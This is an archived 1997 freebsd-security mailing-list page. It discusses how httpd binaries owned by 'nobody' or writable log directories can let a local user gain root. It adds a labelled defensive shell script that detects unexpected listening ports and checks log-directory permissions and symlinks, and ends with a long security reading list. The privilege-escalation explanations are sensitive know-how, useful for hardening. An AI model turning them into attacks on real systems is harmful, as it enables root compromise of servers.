> that some people like to leave their sessiond or httpd files owned by > 'nobody'. This allows somebody running CGI on that system to replace > those binaries with their own, hacked binaries (since the scripts are > usually owned as nobody), and the next time httpd starts, they can make it > write a root shell, or just about anything along those lines.
Presuming you start the server as root and have it run as a different user, one other thing to note is to be sure that the directory your log files are in is not writable by anyone you don't trust with root. If someone can write to the directory the logfile is in (or any directory above it), they can almost certainly get root. The log files themselves can be writable by whoever you want (although there is no reason for them to be, and it can let people tamper with them); the directory is the thing that is important.
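Two of the checks suggested in this thread can be scripted. The block below is an added example written for this archive page; it is not code posted by Marc Slemko, Ollivier Robert or anyone else in the thread. `unexpected_listeners` implements Ollivier Robert's earlier advice to read `netstat -a` for ports something is LISTENing on, reporting any that are not on an allow-list (so a root shell hooked to a spare port shows up even after inetd.conf has been cut down to telnetd). `check_log_dir_chain` implements Marc's point above: every directory from the log file up to the server's top directory must be unwritable by anyone not trusted with root, because a root-started httpd reopens its logs with root privilege. The netstat sample is constructed, port 31337 merely stands for "some spare port", and the function names, the allow-list argument and the OWNER parameter are this example's own choices, not anything from the thread.

```shell
#!/bin/sh
# Post-intrusion audit helpers (added example, not from the mailing-list thread).
# 1) unexpected_listeners: flag LISTENing TCP ports not on an allow-list,
#    reading "netstat -an" output from stdin.
# 2) check_log_dir_chain: walk from a log file's directory up to a top
#    directory and report any directory that is group/other-writable or
#    not owned by the expected account.

# Constructed sample of BSD-style "netstat -an" output (not a real capture).
# Port 31337 stands in for a spare port an intruder bound a shell to.
SAMPLE_NETSTAT='Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp        0      0  192.0.2.10.23          198.51.100.7.1041      ESTABLISHED
tcp        0      0  *.23                   *.*                    LISTEN
tcp        0      0  *.22                   *.*                    LISTEN
tcp        0      0  *.31337                *.*                    LISTEN
udp        0      0  *.514                  *.*'

# usage: netstat -an | unexpected_listeners "22 23 25"
# Prints each unexpected listening port once, in the order first seen.
unexpected_listeners() {
    awk -v allowed="$1" '
        BEGIN { n = split(allowed, ok, " "); for (i = 1; i <= n; i++) allow[ok[i]] = 1 }
        $NF == "LISTEN" {
            port = $4
            sub(/.*[.:]/, "", port)      # BSD prints host.port, Linux host:port
            if (!(port in allow) && !seen[port]++) print port
        }'
}

# usage: check_log_dir_chain LOGFILE TOP [OWNER]
# Returns 0 if every directory from dirname(LOGFILE) up to and including TOP
# is owned by OWNER (default root) and has no group/other write bit set;
# returns 1 if any directory fails, 2 if a directory is missing.
check_log_dir_chain() {
    cl_file=$1; cl_top=$2; cl_owner=${3:-root}; cl_rc=0
    # A symlinked log file is the classic way to turn a writable log dir
    # into a root-owned file write, so flag that first.
    if [ -L "$cl_file" ]; then
        echo "WARNING: $cl_file is a symlink"; cl_rc=1
    fi
    cl_dir=$(dirname "$cl_file")
    while :; do
        if [ ! -d "$cl_dir" ]; then
            echo "missing directory: $cl_dir"; return 2
        fi
        # "-perm -NNN" with octal bits works on both BSD and GNU find:
        # 020 = group write, 002 = other write.
        if [ -n "$(find "$cl_dir" -maxdepth 0 -type d \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "WRITABLE by group/other: $cl_dir"; cl_rc=1
        fi
        if [ -n "$(find "$cl_dir" -maxdepth 0 ! -user "$cl_owner" -print)" ]; then
            echo "NOT owned by $cl_owner: $cl_dir"; cl_rc=1
        fi
        [ "$cl_dir" = "$cl_top" ] && break
        cl_parent=$(dirname "$cl_dir")
        [ "$cl_parent" = "$cl_dir" ] && break    # reached /, TOP was not an ancestor
        cl_dir=$cl_parent
    done
    return $cl_rc
}

# Stand-alone use: "sh audit.sh LOGFILE TOP [OWNER]" checks a log chain;
# with no arguments, demonstrate the listener check on the constructed sample.
if [ $# -ge 2 ]; then
    check_log_dir_chain "$@"
else
    printf '%s\n' "$SAMPLE_NETSTAT" | unexpected_listeners "22 23"
fi
```

On a live box, pipe real `netstat -an` output into `unexpected_listeners` with the ports you expect to be open, and run `check_log_dir_chain /var/log/httpd/access_log /var/log` (paths assumed for illustration) against the account httpd is started as. The walk stops at TOP deliberately: above the server's own tree you will hit `/tmp` and similar sticky, world-writable directories that are not the problem Marc is describing.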
From owner-freebsd-security Thu Jul 31 11:59:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA26536 for security-outgoing; Thu, 31 Jul 1997 11:59:55 -0700 (PDT) Received: from mercury.acs.unt.edu (mercury.acs.unt.edu [129.120.1.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA26530 for ; Thu, 31 Jul 1997 11:59:52 -0700 (PDT) Received: from silo.csci.unt.edu (silo.csci.unt.edu [129.120.3.15]) by mercury.acs.unt.edu (8.8.5/8.8.5) with ESMTP id NAA03008 for ; Thu, 31 Jul 1997 13:59:32 -0500 (CDT) Received: from localhost (webb@localhost) by silo.csci.unt.edu (8.8.4/8.8.4) with SMTP id NAA16283 for ; Thu, 31 Jul 1997 13:59:31 -0500 (CDT) Date: Thu, 31 Jul 1997 13:59:31 -0500 (CDT) From: Michael Ray Webb To: security@FREEBSD.org Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FREEBSD.org X-Loop: FreeBSD.org Precedence: bulk unsubscribe
From owner-freebsd-security Thu Jul 31 13:15:47 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA00569 for security-outgoing; Thu, 31 Jul 1997 13:15:47 -0700 (PDT) Received: from firewall.ftf.dk (root@[129.142.64.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA00558 for ; Thu, 31 Jul 1997 13:15:40 -0700 (PDT) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id WAA29692 for ; Thu, 31 Jul 1997 22:40:20 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id WAA03111 for ; Thu, 31 Jul 1997 22:15:25 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.5/8.8.5/prosa-1.1) id WAA12502; Thu, 31 Jul 1997 22:14:45 +0200 (CEST) Message-ID: <19970731221445.04992@deepo.prosa.dk> Date: Thu, 31 Jul 1997 22:14:45 +0200
From: Philippe Regnauld To: freebsd-security@freebsd.org Subject: Security books (was: Re: So, lets have a checklist compiled (was Re: Security hole) References: <199707301450.JAA25877@shift-f1.com> <14982.870304022@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Content-Description: Main Body X-Mailer: Mutt 0.69 In-Reply-To: <14982.870304022@time.cdrom.com>; from Jordan K. Hubbard on Wed, Jul 30, 1997 at 04:07:02PM -0700 X-Operating-System: FreeBSD 2.2.1-RELEASE i386 Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Jordan K. Hubbard writes: > > The body of available UNIX documentation out there, much of which is > listed in the glossary of the FreeBSD handbook, is about as good as it > gets and it isn't all that bad - even as complete a "checklist" as I > could imagine would end up being largely replicating the docs which > these books currently provide. Books have been mentioned several times -- I can only agree with Jordan and say "read 'em" -- so here's a list that's just been forwarded to me from osiris@pacificnet.net (cf. Bugtraq and BoS) -- hey, Vinnie, read up :-) Internet Firewalls and Network Security. Chris Hare, Karanjit Siyan. 2nd Edition. New Riders Pub. August 1,1996. ISBN: 1562056328 Internet Firewalls. Scott Fuller, Kevin Pagan. Ventana Communications Group Inc. January 1997. ISBN: 1566045061 Building Internet Firewalls. D. Brent Chapman, Elizabeth D. Zwicky. O'Reilly & Associates (ORA). September 1,1995. ISBN: 1565921240 Firewalls and Internet Security : Repelling the Wily Hacker. Addison-Wesley Professional Computing. William R. Cheswick, Steven M. Bellovin. June 1,1994. ISBN: 0201633574 Actually Useful Internet Security Techniques. Larry J. Hughes, Jr. New Riders Publishing, ISBN 1-56205-508-9 PCWEEK Intranet and Internet Firewall Strategies. 
Ed Amoroso & Ron Sharp, Ziff Davies Internet Security Resource Library : Internet Firewalls and Network Security, Internet Security Techniques, Implementing Internet Security. New Riders. December 1995. ISBN: 1562055062 Firewalls FAQ. Marcus J. Ranum. http://www.cis.ohio-state.edu/hypertext/faq/usenet/firewalls-faq/faq.html NCSA Firewall Policy Guide. Compiled by Stephen Cobb, Director of Special Projects. National Computer Security Association. http://www.ncsa.com/fwpg_p1.html Comparison: Firewalls. June 17, 1996. LanTimes. Comprehensive comparison of a wide variety of firewall products. http://www.lantimes.com/lantimes/usetech/compare/pcfirewl.html There Be Dragons. Steven M. Bellovin. "To appear in Proceedings of the Third Usenix UNIX Security Symposium, Baltimore, September 1992." AT&T Bell Laboratories, Murray Hill, NJ. August 15, 1992 Rating of application layer proxies. Michael Richardson. Wed Nov 13 13:54:09 EST 1996. http://www.sandelman.ottawa.on.ca/SSW/proxyrating/proxyrating.html Keeping your site comfortably secure: An Introduction to Internet Firewalls. John P. Wack and Lisa J. Carnahan. National Institute of Standards and Technology. John Wack Thursday, Feb 9 18:17:09 EST 1995. http://csrc.ncsl.nist.gov/nistpubs/800-10/ SQL*Net and Firewalls. David Sidwell & Oracle Corporation. http://www.zeuros.co.uk/firewall/library/oracle-and-fw.pdf Covert Channels in the TCP/IP Protocol Suite. Craig Rowland. Rotherwick & Psionics Software Systems Inc. http://www.zeuros.co.uk/firewall/papers.htm If You Can Reach Them, They Can Reach You. A PC Week Online Special Report, June 19, 1995. William Dutcher. http://www.pcweek.com/sr/0619/tfire.html Packet Filtering for Firewall Systems. February 1995. CERT (and Carnegie Mellon University.) ftp://info.cert.org/pub/tech_tips/packet_filtering Network Firewalls. Steven M. Bellovin and William R. Cheswick. ieeecm, 32(9), pp. 50-57, September 1994. Session-Layer Encryption. Matt Blaze and Steve Bellovin.
Proceedings of the USENIX Security Workshop, June 1995.

A Network Perimeter With Secure External Access. An extraordinary paper that details the implementation of a firewall purportedly at the White House. (Yes, the one at 1600 Pennsylvania Avenue.) Frederick M. Avolio; Marcus J. Ranum. (Trusted Information Systems, Incorporated). Glenwood, MD. January 25, 1994.
http://www.alw.nih.gov/Security/FIRST/papers/firewall/isoc94.ps

Packets Found on an Internet. Interesting analysis of packets appearing at the Application Gateway of AT&T. Steven M. Bellovin. Lambda. August 23, 1993.
ftp://ftp.research.att.com/dist/smb/packets.ps

Using Screend to implement TCP/IP Security Policies. Jeff Mogul. Rotherwick and Digital.
http://www.zeuros.co.uk/firewall/library/screend.ps

Firewall Application Notes. Good document that starts out by describing how to build a firewall. It also addresses application proxies, Sendmail in relation to firewalls and the characteristics of a bastion host. Livingston Enterprises, Inc.
http://www.telstra.com.au/pub/docs/security/firewall-1.1.ps.Z

X Through the Firewall, and Other Application Relays. Treese/Wolman. Digital Equipment Corp. Cambridge Research Lab. (October, 1993?).
ftp://crl.dec.com/pub/DEC/CRL/tech-reports/93.10.ps.Z

Intrusion Protection for Networks 171. BYTE Magazine. April, 1995.

Benchmarking Methodology for Network Interconnect Devices. RFC 1944. S. Bradner & J. McQuaid.
ftp://ds.internic.net/rfc/rfc1944.txt

Firewall Performance Measurement Techniques: A Scientific Approach. Marcus Ranum. February 4, 1996 (Last Known Date of Mod.)
http://www.v-one.com/pubs/perf/approaches.htm

WARDING OFF THE CYBERSPACE INVADERS. Business Week. 03/13/95. Amy Cortese in New York, with bureau reports.

Vulnerability in Cisco Routers used as Firewalls. Computer Incident Advisory Capability Advisory: Number D-15. May 12, 1993 1500 PDT.
http://ciac.llnl.gov/ciac/bulletins/d-15.shtml

WAN-Hacking with AutoHack - Auditing Security behind the Firewall. Alec D.E. Muffett. (Network Security Group, Sun Microsystems, United Kingdom.) Written by the author of Crack, the famous password cracking program. Extraordinary document that deals with methods of auditing security from behind a firewall. (And auditing of a network so large that it contained tens of thousands of hosts!) June 6, 1995.
http://www.telstra.com.au/pub/docs/security/muffett-autohack.ps

Windows NT Firewalls Are Born. February 4, 1997. PC Magazine.
http://www.pcmagazine.com/features/firewall/_open.htm

Group of 15 Firewalls Hold Up Under Security Scrutiny. Stephen Lawson. June 1996. InfoWorld.
http://www.infoworld.com/cgi-bin/displayStory.pl?96067.firewall.htm

IP v6 Release and Firewalls. Uwe Ellermann. 14th Worldwide Congress on Computer and Communications Security. Protection, pp. 341-354, June 1996.

The SunScreen Product Line Overview. (Sun Microsystems.)
http://www.sun.com/security/overview.html

Product Overview for IBM Internet Connection Secured Network Gateway for AIX, Version 2.2. (IBM Firewall Information.)
http://www.ics.raleigh.ibm.com/firewall/overview.htm

The Eagle Firewall Family. (Raptor Firewall Information.)
http://www.raptor.com/products/brochure/40broch.html

Secure Computing Firewall™ for NT. Overview. (Secure Computing).
http://www.sctc.com/NT/HTML/overview.html

Check Point FireWall-1 Introduction. (Checkpoint Technologies Firewall Information.)
http://www.checkpoint.com/products/firewall/intro.html

Cisco PIX Firewall. (Cisco Systems Firewall Information.)
http://www.cisco.com/univercd/data/doc/cintrnet/prod_cat/pcpix.htm

Protecting the Fortress From Within and Without. R. Scott Raynovich. April 1996. LAN Times.
http://www.wcmh.com/lantimes/96apr/604c051a.html

Internet Firewalls: An Introduction. Firewall White Paper. NMI Internet Expert Services. PO Box 8258. Portland, ME 04104-8258.
http://www.netmaine.com/netmaine/whitepaper.html

Features of the Centri(TM) Firewall. (Centri Firewall Information.)
http://www.gi.net/security/centrifirewall/features.html

Five Reasons Why an Application Gateway is the Most Secure Firewall. (Global Internet.)
http://www.gi.net/security/centrifirewall/fivereasons.html

An Introduction to Intrusion Detection. Aurobindo Sundaram. Last Apparent Date of Modification: October 26, 1996.
http://www.techmanager.com/nov96/intrus.html

Intrusion Detection for Network Infrastructures. S. Cheung, K.N. Levitt, C. Ko. 1995 IEEE Symposium on Security and Privacy, Oakland, CA, May 1995.
http://seclab.cs.ucdavis.edu/papers/clk95.ps

Network Intrusion Detection. Biswanath Mukherjee and L. Todd Heberlein and Karl N. Levitt. IEEE Network, May 1994.

Fraud and Intrusion Detection in Financial Information Systems. S. Stolfo and P. Chan and D. Wei and W. Lee and A. Prodromidis. 4th ACM Computer and Communications Security Conference, 1997.
http://www.cs.columbia.edu/~sal/hpapers/acmpaper.ps.gz

A Pattern-Oriented Intrusion-Detection Model and Its Applications. Shiuhpyng W. Shieh and Virgil D. Gligor. Research in Security and Privacy, IEEECSP, May 1991.

Detecting Unusual Program Behavior Using the Statistical Component of the Next-generation Intrusion Detection Expert System (NIDES). Debra Anderson, Teresa F. Lunt, Harold Javitz, Ann Tamaru, and Alfonso Valdes. SRI-CSL-95-06, May 1995. (Available in hard copy only.) Abstract:
http://www.csl.sri.com/tr-abstracts.html#csl9506

Intrusion Detection Systems (IDS): A Survey of Existing Systems and A Proposed Distributed IDS Architecture. S.R. Snapp, J. Brentano, G.V. Dias, T.L. Goan, T. Grance, L.T. Heberlein, C. Ho, K.N. Levitt, B. Mukherjee, D.L. Mansur, K.L. Pon, and S.E. Smaha. Technical Report CSE-91-7, Division of Computer Science, University of California, Davis, February 1991.
http://seclab.cs.ucdavis.edu/papers/bd96.ps

A Methodology for Testing Intrusion Detection Systems. N. F. Puketza, K. Zhang, M. Chung, B. Mukherjee, R. A. Olsson. IEEE Transactions on Software Engineering, Vol.22, No.10, October 1996.
http://seclab.cs.ucdavis.edu/papers/tse96.ps

GrIDS -- A Graph-Based Intrusion Detection System for Large Networks. S. Staniford-Chen, S. Cheung, R. Crawford, M. Dilger, J. Frank, J. Hoagland, K. Levitt, C. Wee, R. Yip, D. Zerkle. The 19th National Information Systems Security Conference.
http://seclab.cs.ucdavis.edu/papers/nissc96.ps

NetKuang--A Multi-Host Configuration Vulnerability Checker. D. Zerkle, K. Levitt. Proc. of the 6th USENIX Security Symposium. San Jose, California. 1996.
http://seclab.cs.ucdavis.edu/papers/zl96.ps

Simulating Concurrent Intrusions for Testing Intrusion Detection Systems: Parallelizing Intrusions. M. Chung, N. Puketza, R.A. Olsson, B. Mukherjee. Proc. of the 1995 National Information Systems Security Conference. Baltimore, Maryland. 1995.
http://seclab.cs.ucdavis.edu/papers/cpo95.ps

Holding Intruders Accountable on the Internet. S. Staniford-Chen and L.T. Heberlein. Proc. of the 1995 IEEE Symposium on Security and Privacy, Oakland, CA, 8-10 May 1995.
http://seclab.cs.ucdavis.edu/~stanifor/seclab_only/notes/ieee_conf_94/revision/submitted.ps

Machine Learning and Intrusion Detection: Current and Future Directions. J. Frank. Proc. of the 17th National Computer Security Conference, October 1994.

Another Intrusion Detection Bibliography.
http://doe-is.llnl.gov/nitb/refs/bibs/bib1.html

Intrusion Detection Bibliography.
http://www.cs.purdue.edu/coast/intrusion-detection/ids_bib.html

Intrusion Detection Systems. This list concentrates primarily on discussions about methods of intrusion or intrusion detection.
Target: majordomo@uow.edu.au
Command: subscribe ids (In BODY of message)

The WWW Security List. Members of this list discuss all techniques to maintain (or subvert) WWW security. (Things involving secure methods of HTML, HTTP and CGI.)
Target: www-security-request@nsmx.rutgers.edu
Command: SUBSCRIBE www-security your_email_address (In BODY of message)

The Sneakers List. This list discusses methods of circumventing firewall and general security. This list is reserved for lawful tests and techniques.
Target: majordomo@CS.YALE.EDU
Command: SUBSCRIBE Sneakers (In BODY of message)

The Secure HTTP List. This list is devoted to the discussion of S-HTTP and techniques to facilitate this new form of security for WWW transactions.
Target: shttp-talk-request@OpenMarket.com
Command: SUBSCRIBE (In BODY of message)

The NT Security List. This list is devoted to discussing all techniques of security related to the Microsoft Windows NT operating system. (Individuals also discuss security aspects of other Microsoft operating systems as well.)
Target: request-ntsecurity@iss.net
Command: subscribe ntsecurity (In BODY of message)

The Bugtraq List. This list is for posting or discussing bugs in various operating systems, though UNIX is the most often discussed. The information here can be quite explicit. If you are looking to learn the fine aspects (and cutting edge news) in UNIX security, this list is for you.
Target: LISTSERV@NETSPACE.ORG
Command: SUBSCRIBE BUGTRAQ (In BODY of message)

Password Security: A Case History. Robert Morris and Ken Thompson.
http://www.sevenlocks.com/papers/password/pwstudy.ps

Site Security Handbook (update and Idraft version; June 1996, CMU. Draft-ietf-ssh-handbook-03.txt.) Barbara Fraser.
http://www.internic.net/internet-drafts/draft-ietf-ssh-handbook-03.txt

Improving the Security of Your Site by Breaking Into It. Dan Farmer & Wietse Venema. (1995)
http://www.craftwork.com/papers/security.html

Making Your Setup More Secure. NCSA Tutorial Pages.
http://hoohoo.ncsa.uiuc.edu/docs/tutorials/security.html

The Secure HyperText Transfer Protocol. E. Rescorla, A. Schiffman (EIT). July 1995.
http://www.eit.com/creations/s-http/draft-ietf-wts-shttp-00.txt

The SSL Protocol. (IDraft) Alan O. Freier & Philip Karlton (Netscape Communications) with Paul C. Kocher.
http://home.netscape.com/eng/ssl3/ssl-toc.html

Writing, Supporting, and Evaluating TripWire. A Publicly Available Security Tool; Kim/Spafford.
http://www.raptor.com/lib/9419.ps

The Design and Implementation of TripWire. A Filesystem Integrity Checker; Kim/Spafford. Location:
http://www.raptor.com/lib/9371.ps

X Window System Security. Ben Gross & Baba Buehler. Beckman Institute System Services. Last Apparent Date of Modification: January 11, 1996.
http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html

On the (in)Security of the Windowing System X. Marc VanHeyningen of Indiana University. September 14, 1994.
http://www.cs.indiana.edu/X/security/intro.html

Security in the X11 Environment. Pangolin. University of Bristol, UK. January, 1995.
http://sw.cse.bris.ac.uk/public/Xsecurity.html

Security in Open Systems. (NIST) John Barkley, Editor. (With Lisa Carnahan, Richard Kuhn, Robert Bagwill, Anastase Nakassis, Michael Ransom, John Wack, Karen Olsen, Paul Markovitz and Shu-Jen Chang.) US Department of Commerce. Section: The X Window System: Bagwill, Robert.
http://csrc.ncsl.nist.gov/nistpubs/800-7/node62.html#SECTION06200000000000000000

Security Enhancements of the DEC MLS+ System; The Trusted X Window System. November, 1995.
http://ftp.digital.com/pub/Digital/info/SPD/46-21-XX.txt

Evolution of a Trusted B3 Window System Prototype. J. Epstein, J. McHugh, R. Pascale, C. Martin, D. Rothnie, H. Orman, A. Marmor-Squires, M. Branstad, and B. Danner. In Proceedings of the 1992 IEEE Symposium on Security and Privacy, 1992.

A Prototype B3 Trusted X Window System. J. Epstein, J. McHugh, R. Pascale, H. Orman, G. Benson, C. Martin, A. Marmor-Squires, B. Danner, and M. Branstad. The Proceedings of the 7th Computer Security Applications Conference, December, 1991.

Improving X Windows Security. UNIX World, (Volume IX, Number 12) December 1992. Linda Mui.

Security and the X Window System. UNIX World, 9(1), p. 103. January 1992. Dennis Sheldrick.

The X Window System. Scheifler, Robert W. & Gettys, Jim. ACM Transactions on Graphics. Vol.5, No. 2 (April 1986), pp. 79-109.
http://www.acm.org/pubs/toc/Abstracts/0730-0301/24053.html

X Window Terminals. Digital Technical Journal of Digital Equipment Corporation, 3(4), pp. 26-36, Fall 1991. Björn Engberg and Thomas Porcher.
ftp://ftp.digital.com/pub/Digital/info/DTJ/v3n4/X_Window_Terminals_01jul1992DTJ402P8.ps

Information Security: Computer Attacks at Department of Defense Pose Increasing Risks; General Accounting Office. Report on failed security at US Defense sites.
http://www.epic.org/security/GAO_OMB_security.html

Defense Directive 5200.28. "Security requirements for Automated Information Systems." Document describing some antiquated government standards for security.
http://140.229.1.16:9000/htdocs/teinfo/directives/soft/5200.28.html

The Evaluated Products List (EPL). A list of products that have been evaluated for security ratings, based on DOD guidelines.
http://www.radium.ncsc.mil/tpep/epl/index.html

INTERNIC, or the Network Information Center. INTERNIC provides comprehensive databases on networking information. These databases contain the larger portion of collected knowledge on the design and scope of the Internet. (Of main importance here is the database of RFC documents.)
http://ds0.internic.net/ds/dspg1intdoc.html

The Rand Corporation. Security resources of various sorts. Also: very engrossing "early" documents on the Internet's design.
http://www.rand.org/publications/electronic/

Connected: An Internet Encyclopedia. (Incredible on-line resource for RFC documents and related information, apparently painstakingly translated into HTML.)
http://www.freesoft.org/Connected/RFC/826/

The Computer Emergency Response Team. (CERT) An organization that assists sites in responding to network security violations, break-ins and so forth. Great source of information, particularly for vulnerabilities.
http://www.cert.org

Security Survey of Key Internet Hosts & Various Semi-Relevant Reflections. D. Farmer. Fascinating independent study conducted by one of the authors of the now famous SATAN program. The survey involved approximately 2200 sites. The results are disturbing.
http://www.trouble.org/survey/

CIAC. (U.S. Department of Energy's Computer Incident Advisory Capability.) The CIAC provides computer security services to employees and contractors of the United States Department of Energy, but the site is open to the public as well. There are many tools and documents at this location.
http://ciac.llnl.gov/

The National Computer Security Association. This site contains a great deal of valuable security information, including reports, papers, advisories and analyses of various computer security products and techniques.
http://www.ncsa.com/

Short Courses in Information Systems Security at George Mason University. This site contains information about security courses. Moreover, there are links to a comprehensive bibliography of various security related documents.
http://www.isse.gmu.edu:80/~gmuisi/

NCSA RECON. Spooks on the Net. The National Computer Security Association's "special" division. They offer a service where one can search through thousands of downloaded messages passed amongst hackers and crackers on BBS boards and the Internet. An incredible security resource, but a commercial one.
http://www.isrecon.ncsa.com/public/faq/isrfaq.htm

Lucent Technologies. Courses on security from the folks who really know security.
http://www.attsa.com/

Massachusetts Institute of Technology distribution site for United States residents for Pretty Good Privacy (PGP). PGP provides some of the most powerful, military grade encryption currently available.
http://web.mit.edu/network/pgp.html

The Anonymous Remailer FAQ. A document that covers all aspects of anonymous remailing techniques and tools.
http://www.well.com/user/abacard/remail.html

The Anonymous Remailer List. A comprehensive but often changing (dynamic) list of anonymous remailers.
http://www.cs.berkeley.edu/~raph/remailer-list.html

Microsoft ActiveX Security. This page addresses the security features of ActiveX.
http://www.microsoft.com/intdev/signcode/

Purdue University COAST Archive. One of the more comprehensive security sites, containing many tools and documents of deep interest within the security community.
http://www.cs.purdue.edu//coast/archive/

Raptor Systems. Makers of one of the better firewall products on the Net have established a fine security library.
http://www.raptor.com/library/library.html

The Risks Forum. A moderated digest of security and other risks in computing. A great resource that is also searchable. You can tap the better security minds on the Net.
http://catless.ncl.ac.uk/Risks

FIRST. (Forum of Incident Response and Security Teams). A conglomeration of many organizations undertaking security measures on the Internet. A powerful organization and good starting place for sources.
http://www.first.org/

The CIAC Virus Database. The ultimate virus database on the Internet. An excellent resource to learn about various viruses that can affect your platform.
http://ciac.llnl.gov/ciac/CIACVirusDatabase.html

Information Warfare and Information Security on the Web. A comprehensive list of links and other resources concerning Information Warfare over the Internet.
http://www.fas.org/irp/wwwinfo.html

Criminal Justice Studies of the Law Faculty of University of Leeds, The United Kingdom. Site with interesting information on cryptography and civil liberties.
http://www.leeds.ac.uk/law/pgs/yaman/cryptog.htm

Federal Information Processing Standards Publication documents. (Government guidelines.) National Institute of Standards and Technology reports on DES encryption and related technologies.
http://csrc.nist.gov/fips/fips46-2.txt

Wordlists available at NCSA and elsewhere. (For use in testing the strength of, or "cracking", UNIX passwords.)
http://sdg.ncsa.uiuc.edu/~mag/Misc/Wordlists.html

Department of Defense Password Management Guideline. (Treatment of password security in classified environments.)
http://www.alw.nih.gov/Security/FIRST/papers/password/dodpwman.txt

Dr. Solomon's. A site filled with virus information. Anyone concerned with viruses (or anyone who just wants to know more about virus technology) should visit Dr. Solomon's site.
http://www.drsolomon.com/vircen/allabout.html

The Seven Locks server. An eclectic collection of security resources, including a number of papers that cannot be found elsewhere!
http://www.sevenlocks.com/CIACA-10.htm

S/Key informational page. Provides information on S/Key and use of one time passwords in authentication.
http://medg.lcs.mit.edu/people/wwinston/skey-overview.html

A page devoted to ATP, the "Anti-Tampering Program". (In some ways, similar to Tripwire or Hobgoblin.)
http://www.cryptonet.it/docs/atp.html

Bugtraq Archives. An archive of the popular mailing list, Bugtraq. This is significant because Bugtraq is one of the most reliable sources for up-to-date reports on newly found vulnerabilities in UNIX (and at times, other operating systems.)
http://geek-girl.com/bugtraq/

Wang Federal. This company produces very high quality security operating systems and other security solutions. They are the leader in TEMPEST technology.
http://www.wangfed.com

The Center for Secure Information Systems. This site, affiliated with the Center at George Mason University, has some truly incredible papers. There is much research going on here; research of a cutting edge nature. The link below sends you directly to the publications page, but you really should explore the entire site.
http://www.isse.gmu.edu/~csis/publication.html

SRI International. Some very highbrow technical information. The technical reports here are of extreme value. However, you must have at least a fleeting background in security to even grasp some of the concepts. Nevertheless, a great resource.
http://www.sri.com/

The Security Reference Index. This site, maintained by the folks at telstra.com, is a comprehensive pointer page to many security resources.
http://www.telstra.com.au/info/security.html

Wietse Venema's Tools Page. This page, maintained by Wietse Venema (co-author of SATAN and author of TCP_Wrapper and many other security tools), is filled with papers, tools and general information. It is a must-visit for any UNIX system administrator.
ftp://ftp.win.tue.nl/pub/security/index.html

United States. Congress. House. Committee on Science, Space, and Technology. Subcommittee on Science. Internet security: Hearing Before the Subcommittee on Science of the Committee on Science, Space, and Technology. U.S. House of Representatives, One Hundred Third Congress, second session, March 22, 1994. Washington. U.S. G.P.O. For sale by the U.S. G.P.O., Supt. of Docs., Congressional Sales Office, 1994.

UNIX Unleashed. SAMS Publishing, 1994. ISBN: 0-672-30402-3.

Internet QuickKIT. Brad Miser. HAYDEN. ISBN: 1568302401.

Bots and Other Internet Beasties. SAMS.NET. Joseph Williams. ISBN: 1575210169. (1996)

The Internet Unleashed 1996. SAMS.NET. SAMS Development Group. ISBN: 157521041X. (1995)

Microsoft Internet Information Server 2 Unleashed. Arthur Knowles. SAMS.NET. ISBN: 1575211092. (1996)

Designing and Implementing Microsoft Internet Information Server. SAMS.NET. ISBN: 1575211688. (1996)

Internet Research Companion. Que Education and Training. Geoffrey McKim. ISBN: 1575760509. (1996)

An Interactive Guide to the Internet. Que Education and Training. J. Michael Blocher, Vito Amato & Jon Storslee. ISBN: 1575763540. (1996)

Internet Security for Business. New York. Wiley, 1996. xi, 452 p. : ill. ; 24 cm. LC CALL NUMBER: HD30.38 .I57 1996

Managing Windows NT Server 4. NRP. Howard F. Hilliker. ISBN: 1562055763. (1996)

Internet 1997 Unleashed, Second Edition. SAMS.NET. Jill Ellsworth, Billy Barron, et al. ISBN: 1575211858. (1996)

Windows NT Server 4 Security, Troubleshooting, and Optimization. NRP. ISBN: 1562056018. (1996)

Apache Server Survival Guide. SAMS.NET. Manuel Alberto Ricart. ISBN: 1575211750. (1996)

Internet Firewalls and Network Security, Second Edition. NRP. Chris Hare and Karanjit S. Siyan, Ph.D. ISBN: 1562056328. (1996)

PC Week Intranet and Internet Firewalls Strategies. ZDPRESS. Ed Amoroso & Ronald Sharp. ISBN: 1562764225. (1996)

Internet Security Professional Reference. NRP. Chris Hare, et al. ISBN: 1562055577. (1996)

NetWare Security. NRP. William Steen. ISBN: 1562055453. (1996)

Internet Security Resource Library. NRP. Box-set. ISBN: 1562055062. (1996)

LINUX System Administrator's Survival Guide. SAMS. Timothy Parker, Ph.D. ISBN: 0672308509. (1996)

Internet Commerce. NRP. Andrew Dahl and Leslie Lesnick. ISBN: 1562054961. (1995)

Windows NT Server 4 Security, Troubleshooting, and Optimization. NRP. ISBN: 1562056018. (1996)

E-Mail Security: How To Keep Your Electronic Messages Private. Bruce Schneier. John Wiley & Sons Inc. 605 Third Ave. New York, NY 10158. ISBN: 0-471-05318-X

Protection and Security on the Information Superhighway. Frederick B. Cohen. John Wiley & Sons Inc. 605 Third Ave. New York, NY 10158. ISBN: 0-471-11389-1

Firewalls and Internet Security: Repelling the Wily Hacker. William R. Cheswick and Steven M. Bellovin. Addison-Wesley Publishing Co. 1 Jacob Way, Reading, MA 01867. ISBN: 0-201-63357-4

Practical UNIX & Internet Security, 2nd Edition. Simson Garfinkel & Gene Spafford. 2nd Edition April 1996. ISBN: 1-56592-148-8

UNIX System Security. David A. Curry. Addison Wesley Publishing Company, Inc. 1992. ISBN: 0-201-56327-4

